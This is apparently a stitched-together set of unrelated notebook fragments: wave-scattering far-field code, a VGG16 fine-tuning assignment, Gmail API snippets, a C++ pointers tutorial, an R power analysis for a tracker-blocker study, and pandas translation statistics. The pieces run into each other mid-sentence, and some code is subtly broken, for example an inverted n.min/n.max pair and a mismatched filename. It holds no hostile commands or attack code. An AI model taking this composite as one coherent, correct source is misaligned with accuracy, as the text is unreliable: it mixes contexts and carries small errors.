scattered_field(solp_eval, opCirc_big, M_big, N_big, MR_big) # Total field u_big = u_inc_big + u_sca_big matplotlib.rcParams.update({'font.size': 20}) plt.rc('text', usetex=True) plt.rc('font', family='serif') fig = plt.figure(figsize=(16, 10)) ax = fig.gca() # plt.imshow(np.abs(u_big.T), extent=[r_big[0, 0, 0], r_big[-1, 0, 0], r_big[0, 0, 1], r_big[0, -1, 1]], # cmap=plt.cm.get_cmap('viridis'), interpolation='spline16') plt.imshow(np.real(u_big.T), extent=[r_big[0, 0, 0], r_big[-1, 0, 0], r_big[0, 0, 1], r_big[0, -1, 1]], cmap=plt.cm.get_cmap('seismic'), interpolation='none') polygon = Polygon(verts, facecolor="none", edgecolor='black', lw=0.8) plt.gca().add_patch(polygon) plt.axis('off') # fig.savefig('results/hex_k10_pixel.png') # plt.xlabel('$x$') # plt.ylabel('$y$') # plt.colorbar() 2/lambda_ext M_big*N_big, M_big, N_big dx/0.0149 M_big*N_big*50 32000*256Far-field patternFor many applications, it is the far-field pattern that is of primary interest. The scattered field has the asymptotic (large $kr$) behaviour$$ u^s(x) = \frac{e^{ik|x|}}{|x|^{(d-1)/2}}\left(u_{\infty}(\hat{x})+\mathcal{O}\left(\frac{1}{|x|})\right)\right),$$uniformly with respect to $\hat{x}\in\mathcal{S}^{d-1}$, where the *far-field pattern* $u_{\infty}(\cdot)$ is given by$$ u_{\infty}(\hat{x}) = c_d k^2\int_V(\mu(y)^2-1)e^{-ik\hat{x}\cdot y}u(y)\text{d}y,$$with $$ c_d = \begin{cases} \frac{e^{i\pi/4}}{\sqrt{8\pi k}}\ & d=2, \\ \frac{1}{4\pi}\ & d=3. 
\end{cases}$$def far_field(angle_inc, theta, r, ko, MR, u_sol): # theta = np.linspace(0, 2 * np.pi, n+1) n = len(theta) x_hat = np.array([np.cos(theta+angle_inc), np.sin(theta+angle_inc)]) ffp = np.zeros((n, 1), dtype=np.complex128) for i in range(n): dot_prod = x_hat[0, i] * r[:, :, 0] + x_hat[1, i] * r[:, :, 1] exp = np.exp(-1j * ko * dot_prod) ffp[i] = np.sum(MR * exp * u_sol) c_d = np.exp(1j*np.pi/4) / np.sqrt(8*np.pi*ko) ffp *= c_d return ffp # Evaluate far field in n evenly spaced directions between angles 0 and 180 degrees n = 180 * 2 theta_ffp = np.linspace(0, np.pi, n) ffp = far_field(angle, theta_ffp, r, ko, MR, u_sol) fig = plt.figure(figsize=(10, 7)) ax = fig.gca() plt.plot(theta_ffp[:] * 180 / np.pi, np.abs(ffp[:])) plt.grid('on') plt.autoscale(enable=True, axis='both', tight=True) plt.xlabel('Scattering angle (degrees)') plt.ylabel('$|u_{\infty}|$')Random orientationNow let's consider a hexagon in random orientation. In order to compute the far-field pattern of a randomly-oriented hexagon, we simple average many far-field patterns for different incident wave directions. Owing to the symmetry of the hexagon, we need only consider incident angles between 0 and 60 degrees (actually, 30 degrees would suffice but 0 to 60 is easier to implement).# Discretise (0, 60) degrees uniformly into n_angles angles n_angles = 10 angles = np.linspace(0, np.pi/3, n_angles + 1)For each incident angle we need to solve the linear system with the appropriate right-hand side and then compute the far-field pattern. This means we do not need to reassemble the matrix-operator, but just the right-hand side and then perform the iterative solve.FFP = np.zeros((n_angles, n), dtype=np.complex128) for i_angle in range(n_angles): # Assemble right-hand side d_inc = np.array([np.cos(angles[i_angle]), np.sin(angles[i_angle])]) u_inc = PlaneWave_2d(1, ko, d_inc, r) rhs = np.zeros((M, N), dtype=np.complex128) rhs[idx] = u_inc[idx] rhs_vec = rhs.reshape((M*N, 1), order='F') # Solve linear system it_count = 0 start = time.time() solp, info = gmres(A, rhs_vec, M=prec, tol=1e-4, callback=iteration_counter) end = time.time() print("The linear system was solved in {0} iterations".format(it_count)) print("Solve time {0} seconds".format(end-start)) u_sol = solp.reshape(M, N, order='F') # ffp, theta = far_field(angles[i_angle], n, r, ko, MR, u_sol) ffp = far_field(angles[i_angle], theta_ffp, r, ko, MR, u_sol) FFP[i_angle, :] = ffp[:, 0] # Calculate an averaged far-field pattern ffp_mean = np.sum(FFP, axis=0) / n_angles # Plot the FFP for randomly-oriented hexagon. The 22 degree halo is indicated by the dashed line. 
fig = plt.figure(figsize=(10, 7)) ax = fig.gca() plt.plot(theta_ffp * 180/np.pi, np.abs(ffp_mean)) plt.vlines(22, 0, np.max(np.abs(ffp_mean)), 'k', 'dashed') plt.grid('on') plt.autoscale(enable=True, axis='both', tight=True) plt.xlabel('Scattering angle (degrees)') plt.ylabel('$|u_{\infty}|$') # Identify the precise angle of the "22 degree" halo # First crop off the first 15 degrees worth of values since they are dominant ffp_crop = ffp_mean[30:] theta_crop = theta_ffp[30:] # Max value index ind_max = np.argmax(np.abs(ffp_crop)) print('Halo is located at ' + str.format('{0:.2f}', theta_crop[ind_max] * 180 / np.pi) + ' degrees.')Halo is located at 21.56 degrees.Using pre-trained NN!conda install -y nomkl > tmp.log import numpy as np import theano import theano.tensor as T import lasagne import cPickle as pickle import os import matplotlib.pyplot as plt %matplotlib inline import scipy from scipy.misc import imread, imsave, imresize from lasagne.utils import floatXModel Zoo* https://github.com/Lasagne/Recipes/tree/master/modelzoo* More models within the community* Pick model, copy init, download weights* Here we proceed with vgg16!wget https://s3.amazonaws.com/lasagne/recipes/pretrained/imagenet/vgg16.pkl # copyright: see http://www.robots.ox.ac.uk/~vgg/research/very_deep/ from lasagne.layers import InputLayer from lasagne.layers import DenseLayer from lasagne.layers import NonlinearityLayer from lasagne.layers import DropoutLayer from lasagne.layers import Pool2DLayer as PoolLayer from lasagne.layers import Conv2DLayer as ConvLayer from lasagne.nonlinearities import softmax def build_model(): net = {} net['input'] = InputLayer((None, 3, 224, 224)) net['conv1_1'] = ConvLayer( net['input'], 64, 3, pad=1, flip_filters=False) net['conv1_2'] = ConvLayer( net['conv1_1'], 64, 3, pad=1, flip_filters=False) net['pool1'] = PoolLayer(net['conv1_2'], 2) net['conv2_1'] = ConvLayer( net['pool1'], 128, 3, pad=1, flip_filters=False) net['conv2_2'] = ConvLayer( net['conv2_1'], 128, 3, pad=1, flip_filters=False) net['pool2'] = PoolLayer(net['conv2_2'], 2) net['conv3_1'] = ConvLayer( net['pool2'], 256, 3, pad=1, flip_filters=False) net['conv3_2'] = ConvLayer( net['conv3_1'], 256, 3, pad=1, flip_filters=False) net['conv3_3'] = ConvLayer( net['conv3_2'], 256, 3, pad=1, flip_filters=False) net['pool3'] = PoolLayer(net['conv3_3'], 2) net['conv4_1'] = ConvLayer( net['pool3'], 512, 3, pad=1, flip_filters=False) net['conv4_2'] = ConvLayer( net['conv4_1'], 512, 3, pad=1, flip_filters=False) net['conv4_3'] = ConvLayer( net['conv4_2'], 512, 3, pad=1, flip_filters=False) net['pool4'] = PoolLayer(net['conv4_3'], 2) net['conv5_1'] = ConvLayer( net['pool4'], 512, 3, pad=1, flip_filters=False) net['conv5_2'] = ConvLayer( net['conv5_1'], 512, 3, pad=1, flip_filters=False) net['conv5_3'] = ConvLayer( net['conv5_2'], 512, 3, pad=1, flip_filters=False) net['pool5'] = PoolLayer(net['conv5_3'], 2) net['fc6'] = DenseLayer(net['pool5'], num_units=4096) net['fc6_dropout'] = DropoutLayer(net['fc6'], p=0.5) net['fc7'] = DenseLayer(net['fc6_dropout'], num_units=4096) net['fc7_dropout'] = DropoutLayer(net['fc7'], p=0.5) net['fc8'] = DenseLayer( net['fc7_dropout'], num_units=1000, nonlinearity=None) net['prob'] = NonlinearityLayer(net['fc8'], softmax) return net #classes' names are stored here classes = pickle.load(open('classes.pkl')) #for example, 10th class is ostrich: print classes[9]You have to implement two functions in the cell below.Preprocess function should take the image with shape (w, h, 3) and transform it into a tensor with 
shape (1, 3, 224, 224). Without this transformation, vgg16 won't be able to digest the input image. Additionally, your preprocessing function has to rearrange channels RGB -> BGR and subtract mean values from every channel.MEAN_VALUES = np.array([104, 117, 123]) IMAGE_W = 224 def preprocess(img): img = img[:, :, ::-1].astype(np.float64) - MEAN_VALUES #convert from [w,h,3] to [1,3,w,h] img = np.transpose(img, (2, 0, 1))[None] return img def deprocess(img): img = img.reshape(img.shape[1:]).transpose((1, 2, 0)) for i in xrange(3): img[:,:, i] += MEAN_VALUES[i] return img[:, :, :: -1].astype(np.uint8) img = (np.random.rand(IMAGE_W, IMAGE_W, 3) * 256).astype(np.uint8) print np.linalg.norm(deprocess(preprocess(img)) - img)If your implementation is correct, the number above will be small, because the deprocess function is the inverse of the preprocess function Deploy the networknet = build_model() import pickle with open('vgg16.pkl') as f: weights = pickle.load(f) input_image = T.tensor4('input') output = lasagne.layers.get_output(net['prob'], input_image) prob = theano.function([input_image], output)Sanity checkLet's check that the loaded network works. To do so, we feed it a picture of an albatross and verify that it recognizes it correctly.img = imread('sample_images/albatross.jpg') plt.imshow(img) plt.show() p = prob(preprocess(img)) labels = p.ravel().argsort()[-1:-6:-1] print 'top-5 classes are:' for l in labels: print '%3f\t%s' % (p.ravel()[l], classes[l].split(',')[0])Grand-quest: Dogs Vs Cats* original competition* https://www.kaggle.com/c/dogs-vs-cats* 25k JPEG images of various sizes, 2 classes (guess what) Your main objective* In this seminar your goal is to fine-tune a pre-trained model to distinguish between the two rivaling animals* The first step is to just reuse some network layer as features!wget https://www.dropbox.com/s/ae1lq6dsfanse76/dogs_vs_cats.train.zip?dl=1 -O data.zip !unzip data.zip #If link doesn't work: download from https://www.kaggle.com/c/dogs-vs-cats/datafor starters* Train sklearn model, evaluate validation accuracy (should be >80%)#extract features from images from tqdm import tqdm from scipy.misc import imresize import os X = [] Y = [] #this may be a tedious process. If so, store the results in some pickle and re-use them. for fname in tqdm(os.listdir('train/')): y = fname.startswith("cat") img = imread("train/"+fname) img = preprocess(imresize(img,(IMAGE_W,IMAGE_W))) features = __load our dakka__![img](https://s-media-cache-ak0.pinimg.com/564x/80/a1/81/80a1817a928744a934a7d32e7c03b242.jpg)from sklearn.ensemble import RandomForestClassifier,ExtraTreesClassifier,GradientBoostingClassifier,AdaBoostClassifier from sklearn.linear_model import LogisticRegression, RidgeClassifier from sklearn.svm import SVC from sklearn.tree import DecisionTreeClassifierMain quest* Get the score improved!* You have to reach __at least 95%__ on the test set. More = better.No methods are illegal: ensembling, data augmentation, NN hacks. Just don't let test data slip into training. Split the raw image data * please do train/validation/test instead of just train/test * reasonable but not optimal split is 20k/2.5k/2.5k or 15k/5k/5k Choose which vgg layers you are going to use * Anything but the prob layer is okay * Do not forget that vgg16 uses dropout Build a few layers on top of the chosen "neck" layers.
 * a good idea is to just stack more layers inside the same network * alternative: stack on top of get_output Train the newly added layers for some iterations * you can selectively train some weights by only sending them to your optimizer * `lasagne.updates.mysupermegaoptimizer(loss, only_those_weights_i_wanna_train)` * selecting all weights from the head but not below the neck: * `all_params = lasagne.layers.get_all_params(new_output_layer_or_layers,trainable=True)` * `old_params= lasagne.layers.get_all_params(neck_layers,trainable=True)` * `new_params = [w for w in all_params if w not in old_params]` * it's crucial to monitor the network performance at this and following steps Fine-tune the network body * probably a good idea to SAVE your new network weights now 'cuz it's easy to mess things up. * Moreover, saving weights periodically is a no-nonsense idea * even more crucial to monitor validation performance * main network body may need a separate, much lower learning rate * since updates are dictionaries, one can just compute their union * `updates = {}` * `updates.update(lasagne.updates.how_i_optimize_old_weights())` * `updates.update(lasagne.updates.how_i_optimize_new_weights())` * make sure they do not have overlapping keys. Otherwise, the earlier one will be forgotten. * `assert len(updates) == len(old_updates) + len(new_updates)` Grading* 95% accuracy on test yields 10 points* -1 point per 5% less accuracy Some ways to get bonus points* explore other networks from the model zoo* play with architecture* 96%/97%/98%/99%/99.5% test score (screen pls).* data augmentation, prediction-time data augmentation* use any more advanced fine-tuning technique you know/read anywhere* ml hacks that benefit the final scoreprint "I can do it!"Fetch all labels and tags on this accounttry: # Call the Gmail API service = build('gmail', 'v1', credentials=creds) results = service.users().labels().list(userId='me').execute() labels = results.get('labels', []) if not labels: print('No labels found.') else: print('Labels:') for label in labels: print(label['name']) except HttpError as error: # TODO(developer) - Handle errors from gmail API. print(f'An error occurred: {error}')Get unread message IDs in InboxMessages are paginated, thus the iteration codetry: service = build('gmail', 'v1', credentials=creds) results = service.users().messages().list(userId='me', q="in:inbox is:unread").execute() messages = [] if 'messages' in results: messages.extend(results['messages']) while 'nextPageToken' in results: page_token = results['nextPageToken'] results = service.users().messages().list(userId='me', q="in:inbox is:unread", pageToken=page_token).execute() if 'messages' in results: messages.extend(results['messages']) except HttpError as error: # TODO(developer) - Handle errors from gmail API. print(f'An error occurred: {error}')and their countThis is all I want for my polybar notifierlen(results['messages'])Neural Art Style Transfer Example For example, if this is the image I chose, I would get access to 7 different styles of art inspired by The Starry Night, the Mona Lisa, The Scream, etc. ![Live Code](image/Original.png) And here will be its output ![Live Code](image/one.png)![Live Code](image/two.png)![Live Code](image/three.png)![Live Code](image/four.png)![Live Code](image/five.png)![Live Code](image/six.png)![Live Code](image/seven.png) How to run%%html Pointers Introduction When we declare a variable, such as `int i = 0;`, we are telling the computer to reserve memory for an integer, and set the value of `i` to `0`.
In C++, we can get access to the memory address by taking the **reference** of the variable `i`. We can store that memory address in a **pointer**, which we declare with a single `*`:```c++int myVar = 0; // myVar is a variable that stores the value 0int * myPtr; // myPtr is a variable that will store a pointermyPtr = &myVar; // now myPtr stores the address of myVar```Let's look at a simple piece of code that illustrates this.!gedit src/intro_01.cpp !g++ -o intro_01 src/intro_01.cpp !./intro_01You will see that `iptr` contains a bunch of numbers and letters like `0x7ffd931218f4`. This is the memory address of `i` in your machine. Let's look at a figure that might help us understand. If we think about the memory addresses as integer numbers, as in the picture (101, 102, ..., 201, 202, ...), what is happening is the following. We declare the variable `i`, and it is stored in the memory address `101`. Then we declare a pointer `iptr`, and this variable is stored in memory address `201`. When we set `i = 3`, the value in memory address `101` is set to `3`. When we set `iptr = &i`, we are setting the value of the pointer to the memory address `101`.![Figure 1](figures/figure1.png) Although a pointer contains a memory address, we can **dereference** the pointer to obtain the value at the memory address that it is pointing to by using a single `*`. As an example:```c++int i = 3; // Declare integer variable i and initialize it to 3int * iptr = &i; // Declare integer pointer iptr and initialize it to the memory address of iint j = *iptr; /* Declare integer variable j and set it to the value of * the memory address that iptr is pointing to */```Look at the following code to see what is happening:!gedit src/intro_02.cpp !g++ -o intro_02 src/intro_02.cpp !./intro_02We can also assign pointers so they point to the same address:```c++int i = 3; // Declare integer i and initialize it to 3int * iptr = &i; // Declare integer pointer iptr and initialize it to point to iint * iptr_cp = iptr; // Declare integer pointer iptr_cp and initialize it to point to the same place as iptr``` Let's look at the following piece of code, and guess what the values of the variables are. **DON'T RUN THE CODE YET!!**```c++#include <iostream> int main() { int i = 2; int j = i; int * ptr1 = &i; int * ptr2 = ptr1; // What is the value of *ptr2? std::cout << "*ptr2 = " << *ptr2 << std::endl; i = 3; // What is the value of *ptr2? std::cout << "*ptr2 = " << *ptr2 << std::endl; // What is the value of j? std::cout << "j = " << j << std::endl; *ptr2 = j; // What is the value of *ptr1? std::cout << "*ptr1 = " << *ptr1 << std::endl; // What is the value of i? std::cout << "i = " << i << std::endl; ptr2 = &j; *ptr1 = 5; *ptr2 = *ptr1; // What is the value of i? std::cout << "i = " << i << std::endl; // What is the value of j? std::cout << "j = " << j << std::endl; return 0;}```
However, in C++11 and up, it is recommended to use `nullptr` to initialize a pointer.!gedit src/nullptr_01.cpp !g++ -std=c++11 -o nullptr_01 src/nullptr_01.cpp !./nullptr_01Note two things. First, the pointer has been initialized to `0`. Second, we need C++11 to use `nullptr`. New and delete We have talked about the scope of variables in previous lessons. Pointers also have a scope. When we declare a pointer, it is valid in that scope, and then is gone. However, with pointers we can reserve memory that will persist even outside the scope with the keyword **new**. That will reserve the memory, and no matter what happens in our code, that memory will be kept reserved. However, everytime we use `new`, we will have to free that memory using the keyword **delete**. This opens a new whole lot of possibilities, but also a whole new lot of problems. What happens if we are in a loop where we reserve memory, but we forget to delete it inside the loop? We will keep filling the RAM memory until we run out of it. Memory problems are the most common and yet the most difficult bugs to get rid of. The code below shows how to use these keywords:```c++int * ptr = nullptr; // Declare an integer pointer and initialize it to nullptrptr = new int; // We reserve the memory for int*ptr = 3; // Assign 3 to the memory address to which the pointer points toint * ptr2 = new int(3) // Do everything in one linedelete ptr; // Frees the memory of ptrdelete ptr2; // Frees the memory of ptr2``` Heap, Stack and Static memory Whenever we declare a variable, the memory is automatically allocated and freed. This memory region is called the **stack**. Whatever we put in the stack, will be automatically deleted once we get out of that scope. However, when we use the `new` and `delete` keywords, we are using memory in the **heap**. The heap must be manually freed, or we will have memory errors. Finally, there is the **static memory** region, where the global variables are defined. The memory is reserved once, and remains in the same address for the entire execution of the program. These global variables are defined with the `static` keyword in front of them, and they should not be modified unless extremely necessary. Look at the code below to see examples:!gedit src/memory_01.cpp !g++ -o memory_01 src/memory_01.cpp !./memory_01The -> operator When we were looking at vectors or strings, we saw that to call a function of the vector class we needed to use `.`, i.e., `string.size()` or `vector.clear()`. We will mostly use pointers for classes, and as we saw in the previous lesson, classes have member variables and functions. If instead of a class we have a pointer to a class, in order to access a member function we need to use `->` instead of `.`. Let's have a look at the following file:!gedit src/operator_01.cpp !g++ -o operator_01 src/operator_01.cpp !./operator_01Memory debugger: Valgrind Finding memory errors can be a pain, specially if the code is long and made of multiple files. Look at the following source file:!gedit src/valgring_01.cpp !g++ -o valgrind_01 src/valgrind_01.cpp !./valgrind_01Seems to run fine, right? However, as you probably noticed, we used `new` without a `delete`. In this case, the program works fine, and does what is supposed to do, but in general, when there is a memory issue, the code will run returning nonsense stuff. Whenever you write a software, it is recommended to run it under **valgrind**. This is a program that looks for memory leaks, and identifies where are they happening. 
Let's try it:!valgrind ./valgrind_01The output should be something like this:```==54605== Memcheck, a memory error detector==54605== Copyright (C) 2002-2015, and GNU GPL'd, by et al.==54605== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info==54605== Command: ./valgrind_01==54605== *i_ptr = 3==54605== ==54605== HEAP SUMMARY:==54605== in use at exit: 4 bytes in 1 blocks==54605== total heap usage: 1 allocs, 0 frees, 4 bytes allocated==54605== ==54605== LEAK SUMMARY:==54605== definitely lost: 4 bytes in 1 blocks==54605== indirectly lost: 0 bytes in 0 blocks==54605== possibly lost: 0 bytes in 0 blocks==54605== still reachable: 0 bytes in 0 blocks==54605== suppressed: 0 bytes in 0 blocks==54605== Rerun with --leak-check=full to see details of leaked memory==54605== ==54605== For counts of detected and suppressed errors, rerun with: -v==54605== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)```If you see, there are 0 errors, but it is reporting that we lost 4 bytes (size of integer OH SURPRISE!) in the execution. We can rerun it with the options it recommends to see where is it lost:!valgrind --leak-check=full ./valgrind_01Now it adds these lines:```==88796== 4 bytes in 1 blocks are definitely lost in loss record 1 of 1==88796== at 0x4C2A203: operator new(unsigned long) (vg_replace_malloc.c:334)==88796== by 0x40090F: main (in /home/mrierari/codes/LearnCPP11/lessons/07-pointers/valgrind_01)```It is telling us which function is giving the leak. You can look at more info on the internet about options and other features of valgrind. Allocating and deleting arrays A few lessons ago, we saw how to allocate arrays:```c++double myArray[3]; // Allocates a 3 element array in the memory```We did not care about deleting it, since it was put in the stack. However, we can allocate arrays using `new`:```c++double * myArray = new double[5]; // Allocates a 5 element array in the heap```In order to free the memory allocated, we need to call `delete[]`. This will free the memory of the whole array.```c++delete[] myArray; // Frees the memory of the array```In the same way, we can declare n-D arrays:```c++int ** a = new int*[5]; // Declares an array of integer pointers of size 5 for (int i = 0; i < 5; i++) { a[i] = new int[8]; // For each i, declares an array of pointers of size 8}for (int i = 0; i < 5; i++) { delete[] a[i]; // For each i, deletes the array of pointers of size 8}delete[] a; // Deletes the initial 5 element array``` Project: Linked list Introduction With all what we have seen in the previous 7 lessons, now you are ready to start a small project. It will consist on creating a **linked list** of integers. A linked list is similar to a vector, with the difference that the data is not contiguous in memory. The **nodes** of the list can be anywhere, and each node contains the data and a pointer to the next node in the list. Graphically, it would be something like this:![Figure 2](figures/figure2.png)But why complicating our lives if we have vectors? Well, think about an insertion inside a vector. In order to insert something in the position 50 of a vector with 1000 elements, we need to displace all the elements after 50, and change the data. However, with a linked list, we just need to modify 2 nodes: the previous node and the node we are adding. They can be in different areas of the memory, since we have a pointer that points to the next node, no matter where is it. 
The figure below illustrates this:![Figure 3](figures/figure3.png)The node that has been colored different is the one we inserted, and we only needed to modify the blue arrows. All the rest of the nodes remain untouched. However, linked lists have a perk, which is that accessing a node requires to go over the entire list til you find that node. However, in vectors, it is faster, since we know that the elements are contiguous in memory. Project assignment Your goal is to create two classes: `MyNode` and `MyLinkedList`. As you can expect, class `MyLinkedList` will handle the allocation and destruction of the nodes. Since we will be jumping from one scope to the other one, the address of the nodes will have to be allocated in the heap with the operator `new`. In order to make your life easier, in the folder `src/project` there are the header files and cpp files of the two classes: `node.h/cpp` and `linkedlist.h/cpp`. The members are declared, but not defined. Your goal is to define them properly in order to pass all the assertions in `main.cpp`. Also, it needs to run the main function without memory leaks, so when we run `valgrind`, it needs to return that all the allocs were freed. You should not touch the `main.cpp` file or any of the header files `node.h` and `linkedlist.cpp`. If you have any question, you can post it on the [group forum](https://groups.google.com/forum/!forum/cpp-workshop-paesanilab), so other people can help and we can keep track of the problems. Good luck!!gedit src/project/node.h !gedit src/project/linkedlist.h !gedit src/project/node.cpp !gedit src/project/linkedlist.cppTo compile, run the cell below:!g++ -std=c++11 -c src/project/node.cpp !g++ -std=c++11 -c src/project/linkedlist.cpp !g++ -std=c++11 -o main src/project/main.cpp linkedlist.o node.oRun the main test:!./mainRun Valgrind:!valgrind ./mainTracker Blocker Proposal Initial Sample Size CalculationsJuly 2019Details are available in the [design document](https://docs.google.com/document/d/1p_TA7IE5-bKPSSwn8r-c_2KJpUfF387udDqnQhE00fY/edit), July 19, 2019options("scipen"=9, "digits"=4) library(dplyr) library(MASS) # contains fitdistr library(ggplot2) # for plotting library(rlang) library(tidyverse) library(viridis) # colorblind safe palettes library(DeclareDesign) library(beepr) ## Installed DeclareDesign 0.13 using the following command: # install.packages("DeclareDesign", dependencies = TRUE, # repos = c("http://R.declaredesign.org", "https://cloud.r-project.org")) ## DOCUMENTATION AT: https://cran.r-project.org/web/packages/DeclareDesign/DeclareDesign.pdf cbPalette <- c("#999999", "#E69F00", "#56B4E9", "#009E73", "#F0E442", "#0072B2", "#D55E00", "#CC79A7") options(repr.plot.width=7, repr.plot.height=3.5) sessionInfo() ## the power-analysis-utils.R source file includes the following methods: # mu.diff.from.mu.irr # betas.logit.from.prob # betas.logit.from.mean # min.diagnosis.power # iterate.for.power # plot.power.results source("../../SOC412/power-analysis-utils.R")Describe the studyIn this study, we examine and compare rates of the following outcome variable:* Control* Tracker Blocker A* Tracker Blocker B* Tracker Blocker CThe outcome is a binary variable of whether any ads about any products were observed. 
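The diagnosis below is done with DeclareDesign in R. As a quick, language-agnostic cross-check of the same idea, a minimal Monte Carlo sketch (a hypothetical helper, not part of the study code) can simulate the binary outcome in two arms and count how often a pooled two-proportion z-test reaches significance:

```python
import math
import numpy as np

def two_prop_pvalue(x1, n1, x2, n2):
    """Two-sided p-value for a pooled two-proportion z-test."""
    p1, p2 = x1 / n1, x2 / n2
    pooled = (x1 + x2) / (n1 + n2)
    se = math.sqrt(pooled * (1 - pooled) * (1 / n1 + 1 / n2))
    if se == 0:
        return 1.0
    z = (p1 - p2) / se
    return 2 * (1 - 0.5 * (1 + math.erf(abs(z) / math.sqrt(2))))

def mc_power(p_control, p_treatment, n_per_arm, sims=2000, alpha=0.05, seed=0):
    """Fraction of simulated two-arm experiments in which the difference is detected."""
    rng = np.random.default_rng(seed)
    hits = 0
    for _ in range(sims):
        ctl = rng.binomial(1, p_control, n_per_arm).sum()
        trt = rng.binomial(1, p_treatment, n_per_arm).sum()
        hits += two_prop_pvalue(ctl, n_per_arm, trt, n_per_arm) < alpha
    return hits / sims

# Illustrative rates: 75% of control participants see an ad vs. 50% with a blocker,
# with 75 participants per arm (roughly 300 volunteers across four arms).
print(mc_power(0.75, 0.50, n_per_arm=75))
```

With rates that far apart, roughly 75 participants per arm already gives power in the neighbourhood of the 90% figure reported by the full diagnosis below.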
Conduct the Power Analysistracker.block.config.three <- data.frame( pa.label = "tracker.block.config", n.max = 500, n.min = 50, # 30% of seeing ads for one product # with 4 products, there's a 75% chance ctl.rate = 0.75, tracker.a.rate = 0.5, tracker.b.rate = 0.25, tracker.c.rate = 0.0 ) tracker.block.config.two <- data.frame( pa.label = "tracker.block.config", n.max = 100, n.min = 2000, # 30% of seeing ads for one product # with 4 products, there's a 75% chance ctl.rate = 0.75, tracker.a.rate = 0.25, tracker.b.rate = 0.5 ) diagnose.experiment <- function( n.size, cdf, sims.count = 500, bootstrap.sims.count = 500){ design <- declare_population(N = n.size) + declare_potential_outcomes( ANY_AD_Z_0 = rbinom(n.size, 1, cdf$ctl.rate), ANY_AD_Z_1 = rbinom(n.size, 1, cdf$tracker.a.rate), ANY_AD_Z_2 = rbinom(n.size, 1, cdf$tracker.b.rate), ANY_AD_Z_3 = rbinom(n.size, 1, cdf$tracker.c.rate) ) + declare_assignment(num_arms = 4, conditions = c("0","1","2","3")) + declare_estimand(est_ANY_AD_1_0 = cdf$tracker.a.rate - cdf$ctl.rate) + declare_estimand(est_ANY_AD_2_0 = cdf$tracker.b.rate - cdf$ctl.rate) + declare_estimand(est_ANY_AD_3_0 = cdf$tracker.c.rate - cdf$ctl.rate) + declare_reveal(outcome_variables = c("ANY_AD")) + declare_estimator(formula = ANY_AD ~ Z, label = "tracker.a", condition1 = "0", condition2 = "1", estimand = "est_ANY_AD_1_0") + declare_estimator(formula = ANY_AD ~ Z, label = "tracker.b", condition1 = "0", condition2 = "2", estimand = "est_ANY_AD_2_0") + declare_estimator(formula = ANY_AD ~ Z, label = "tracker.c", condition1 = "0", condition2 = "3", estimand = "est_ANY_AD_3_0") diagnosis <- diagnose_design(design, sims = sims.count, bootstrap_sims = bootstrap.sims.count) diagnosis } interval = 25 power.iterate.df <- iterate.for.power(tracker.block.config.three, diagnosis.method=diagnose.experiment, iteration.interval = interval)[1] "min: 50 max: 500 current: 50" [1] " seconds: 13" [1] "min: 50 max: 500 current: 75" [1] " seconds: 13" [1] "min: 50 max: 500 current: 100" [1] " seconds: 13" [1] "min: 50 max: 500 current: 125" [1] " seconds: 13" [1] "min: 50 max: 500 current: 150" [1] " seconds: 13" [1] "min: 50 max: 500 current: 175" [1] " seconds: 13" [1] "min: 50 max: 500 current: 200" [1] " seconds: 13" [1] "min: 50 max: 500 current: 225" [1] " seconds: 13" [1] "min: 50 max: 500 current: 250" [1] " seconds: 13" [1] "min: 50 max: 500 current: 275" [1] " seconds: 13" [1] "min: 50 max: 500 current: 300" [1] " seconds: 13" [1] "min: 50 max: 500 current: 325" [1] " seconds: 13" [1] "min: 50 max: 500 current: 350" [1] " seconds: 13" [1] "min: 50 max: 500 current: 375" [1] " seconds: 14" [1] "min: 50 max: 500 current: 400" [1] " seconds: 14" [1] "min: 50 max: 500 current: 425" [1] " seconds: 14" [1] "min: 50 max: 500 current: 450" [1] " seconds: 14"[...]Plot Resultsggplot(power.iterate.df, aes(n, power, color=estimator_label)) + ## CHART SUBSTANCE geom_line() + geom_point() + ## LABELS AND COSMETICS geom_hline(yintercept=0.9, size=0.25) + theme_bw(base_size = 12, base_family = "Helvetica") + theme(axis.text.x = element_text(angle=45, hjust = 1)) + scale_y_continuous(breaks = seq(0,1,0.1), limits = c(0,1), labels=scales::percent) + scale_x_continuous(breaks = seq(tracker.block.config.three$n.min, tracker.block.config.three$n.max,interval)) + scale_color_viridis(discrete=TRUE) + xlab("number of volunteers needed to detect 25 pct point differences") + ylab("chance of observing difference") + ggtitle("300 volunteers give us a 90% chance of observing 25 pct point diff")Warning message: “Removed 
3 rows containing missing values (geom_path).”Warning message: “Removed 3 rows containing missing values (geom_point).”String Formattingfirst_name='Rose' last_name='Mary' print('Hello! I am {} {}'.format(first_name,last_name)) print('Hello! I am {0} {1}'.format(first_name,last_name)) print('Hello! I am {0} {1}. {1} is my surname'.format(first_name,last_name)) f_name='Karan' age=40 print(f'My name is {f_name}. I am {age} years old')My name is Karan. I am 40 years oldThis notebook provides a detailed view of data from [UNESCO](http://www.unesco.org/xtrans/bsstatexp.aspx) regarding existing translations of books from one language into another. These results are based on data downloaded on 6 October 2014. The downloaded files have been slightly modified in order to be readable with the python-pandas package.import pandas as pd import ipy_table as pytbl %pylab inline # from IPython.display import set_matplotlib_formats # set_matplotlib_formats('pdf') data = pd.read_csv('unesco_xtrans_stats.csv', sep='\t', index_col=0) data = data.fillna(0)
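The slices used in the sections below read `data['English']` as translations *from* English and `data.transpose()['English']` as translations *into* English, which implies that columns hold the original language and rows the target language. A toy example of that layout (made-up numbers, purely illustrative):

```python
import pandas as pd

# Hypothetical counts; columns = original language, rows = target language
toy = pd.DataFrame({'English': [0, 120, 45],
                    'Dutch':   [30,   0,  2],
                    'French':  [80,  15,  0]},
                   index=['English', 'Dutch', 'French'])

print(toy['English'])              # translated FROM English, broken down by target language
print(toy.transpose()['English'])  # translated INTO English, broken down by original language
```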
